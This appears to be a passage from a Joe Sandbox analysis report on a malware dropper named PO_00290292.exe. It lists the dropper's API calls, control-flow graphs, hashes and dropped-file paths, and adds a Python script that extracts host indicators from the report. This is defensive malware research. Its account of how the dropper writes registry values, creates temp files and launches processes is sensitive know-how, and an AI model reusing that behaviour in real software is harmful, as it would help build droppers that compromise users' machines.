                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-2107869092
                                                                  • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                  • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
                                                                  • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                  • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
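The API entries in the function listings on this page (the RegCreateKeyExW/RegSetValueExW pair that stores the cellists.ini path, the GetTempFileNameW call into the user's Temp directory, and the RegOpenKeyExW lookup of Software\Microsoft\Windows\CurrentVersion further down) are the parts of this NSIS stub an analyst turns into host indicators. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses the report's "Api.Module(args), ref: addr" entry format into structured calls, then derives file paths, registry keys and installer markers, rewriting the sandbox user's profile into environment variables so the indicators can be checked on other hosts. The input is constructed from entries copied from this page; the parser assumes that arguments never contain commas (true of the entries here) and maps hive handles with the documented HKEY_* constants (0x80000001 = HKEY_CURRENT_USER, 0x80000002 = HKEY_LOCAL_MACHINE).

```python
"""Parse the per-function "APIs" entries of a Joe Sandbox report into
structured calls and derive host indicators from them.

Added example for this page; not part of Joe Sandbox or of the report.
"""

import re
from dataclasses import dataclass
from typing import List

# Constructed input: API entries copied from the function listings on this
# page (RegCreateKeyExW/RegSetValueExW, GetTempFileNameW, RegOpenKeyExW and
# the lstrcpynW subcall entry).
REPORT_LINES = r"""
• RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
• lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
• RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO_00290292.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Remove folder: ,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00406075
  • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
"""

# One report entry: optional "Part of subcall function <addr>:" prefix,
# then Api.Module(arg,arg,...), ref: <call-site address>.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry hive handles as they appear in the argument columns.
HIVES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}
WIN_PATH_RE = re.compile(r'^"?([A-Za-z]:\\[^"]*)"?$')
REG_SUBKEY_RE = re.compile(r"^(?:Software|SYSTEM|SAM|Security)\\", re.I)
# Sandbox user profile prefixes, most specific first, and the variable that
# stands for them on an arbitrary host.
PROFILE_PREFIXES = (
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Roaming", re.I), "%APPDATA%"),
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local", re.I), "%LOCALAPPDATA%"),
    (re.compile(r"^[A-Za-z]:\\Users\\[^\\]+", re.I), "%USERPROFILE%"),
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str           # address of the call site
    subcall: str = ""  # callee address when the entry is "Part of subcall function"


def parse_api_lines(text):
    """Return the ApiCall records found in a block of report text."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, blank lines, "Strings" entries
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("sub") or ""))
    return calls


def _add(seq, item):
    """Append without duplicates, preserving first-seen order."""
    if item not in seq:
        seq.append(item)


def to_hunt_path(path):
    """Rewrite the sandbox user's profile into an environment variable."""
    for pattern, var in PROFILE_PREFIXES:
        m = pattern.match(path)
        if m:
            return var + path[m.end():]
    return path


def extract_iocs(calls):
    """Derive file, registry and installer-marker indicators from calls."""
    files, keys, markers = [], [], []
    for call in calls:
        # A hive handle in the same argument list qualifies a bare subkey.
        hive = next((HIVES[a] for a in call.args if a in HIVES), "")
        for arg in call.args:
            m = WIN_PATH_RE.match(arg)
            if m:
                _add(files, m.group(1))
            elif REG_SUBKEY_RE.match(arg):
                _add(keys, f"{hive}\\{arg}" if hive else arg)
            elif "NSIS" in arg:
                _add(markers, arg)
    return {
        "file_paths": files,
        "registry_keys": keys,
        "installer_markers": markers,
        "hunt_paths": [to_hunt_path(p) for p in files],
    }


if __name__ == "__main__":
    for kind, items in extract_iocs(parse_api_lines(REPORT_LINES)).items():
        print(kind)
        for item in items:
            print("  ", item)
```

The hunt_paths list is what goes into an endpoint query: the cellists.ini path under %APPDATA%\Microsoft\Windows\Templates\Fiberstoffet90 is the dropped configuration file this stub writes into the registry, and the "NSIS Error" string identifies the installer framework the dropper was built with, which is why the temp-file naming and the recursive registry deletion in the neighbouring functions look like stock NSIS code rather than custom malware logic.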

                                                                   Control-flow Graph (basic blocks and successor edges)

                                                                   • 680 [402bff-402c28]: RegOpenKeyExW -> 681, 682
                                                                   • 681 [402c93-402c97]: exit
                                                                   • 682 [402c2a-402c35] -> 683
                                                                   • 683 [402c50-402c60]: RegEnumKeyW -> 684, 685
                                                                   • 684 [402c62-402c74]: RegCloseKey, call 406558 -> 692, 693
                                                                   • 685 [402c37-402c3a] -> 687, 688
                                                                   • 687 [402c87-402c8a]: RegCloseKey -> 690
                                                                   • 688 [402c3c-402c4e]: call 402bff (recursion into this function's entry) -> 683, 684
                                                                   • 690 [402c90-402c92] -> 681
                                                                   • 692 [402c76-402c85] -> 681
                                                                   • 693 [402c9a-402ca0] -> 690, 695
                                                                   • 695 [402ca2-402cb0]: RegDeleteKeyW -> 690, 697
                                                                   • 697 [402cb2] -> 681
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
                                                                  • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
                                                                  • Opcode Fuzzy Hash: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
                                                                  • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                   Control-flow Graph (basic blocks and successor edges)

                                                                   • 698 [4031ef-403217]: GetTickCount -> 699, 700
                                                                   • 699 [403347-40334f]: call 402d9f -> 705
                                                                   • 700 [40321d-403248]: call 40336e, SetFilePointer -> 706
                                                                   • 705 [403351-403355]: exit
                                                                   • 706 [40324d-40325f] -> 707, 708
                                                                   • 707 [403261] -> 708
                                                                   • 708 [403263-403271]: call 403358 -> 711, 712
                                                                   • 711 [403277-403283] -> 713
                                                                   • 712 [403339-40333c] -> 705
                                                                   • 713 [403289-40328f] -> 714, 715
                                                                   • 714 [403291-403297] -> 715, 717
                                                                   • 715 [4032ba-4032d6]: call 406697 -> 721, 722
                                                                   • 717 [403299-4032b9]: call 402d9f -> 715
                                                                   • 721 [403342] -> 723
                                                                   • 722 [4032d8-4032e0] -> 724, 725
                                                                   • 723 [403344-403345] -> 705
                                                                   • 724 [4032e2-4032ea]: call 405e05 -> 728
                                                                   • 725 [403303-403309] -> 721, 727
                                                                   • 727 [40330b-40330d] -> 721, 729
                                                                   • 728 [4032ef-4032f1] -> 730, 731
                                                                   • 729 [40330f-403322] -> 706, 732
                                                                   • 730 [4032f3-4032ff] -> 713, 733
                                                                   • 731 [40333e-403340] -> 723
                                                                   • 732 [403328-403337]: SetFilePointer -> 699
                                                                   • 733 [403301] -> 729
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00403203
                                                                    • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                                  • SetFilePointer.KERNELBASE(00097E78,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer$CountTick
                                                                  • String ID: x~
                                                                  • API String ID: 1092082344-1841499174
                                                                  • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                  • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                                  • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                  • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                  • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
                                                                  • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                  • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405BEB
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405C93
                                                                  • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0), ref: 00405CA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: 4Wu.Wu$0_B
                                                                  • API String ID: 3248276644-297793725
                                                                  • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                  • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
                                                                  • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                  • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Remove folder: ,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00406075
                                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00406096
                                                                  • RegCloseKey.KERNELBASE(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 004060B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Remove folder:
                                                                  • API String ID: 3677997916-1958208860
                                                                  • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                  • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
                                                                  • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                  • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                    • Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                    • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3585118688-0
                                                                  • Opcode ID: a93272ca9247789d0c80852616a40b8bf2a69f58e54105aa7b18d312abe2cf43
                                                                  • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                                  • Opcode Fuzzy Hash: a93272ca9247789d0c80852616a40b8bf2a69f58e54105aa7b18d312abe2cf43
                                                                  • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                                  • C:\Users\user\AppData\Local\Temp\nsp6601.tmp\, xrefs: 0040390B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsp6601.tmp\
                                                                  • API String ID: 2962429428-515242160
                                                                  • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                  • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
